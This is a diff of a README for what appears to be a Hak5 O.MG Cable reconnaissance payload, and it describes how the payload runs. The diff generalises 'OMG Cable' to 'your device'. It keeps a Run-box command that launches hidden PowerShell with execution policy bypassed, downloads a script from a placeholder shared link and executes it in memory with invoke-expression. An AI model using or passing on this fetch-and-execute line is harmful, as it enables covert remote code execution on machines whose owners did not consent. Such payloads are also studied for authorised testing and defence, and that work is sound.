I-Am-Jakoby/hak5-submissions/OMG/Payloads/OMG-ADV-Recon/README.md

 ### Executing program

-* Plug in OMG Cable
+* Plug in your device
 * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
 ```
 powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl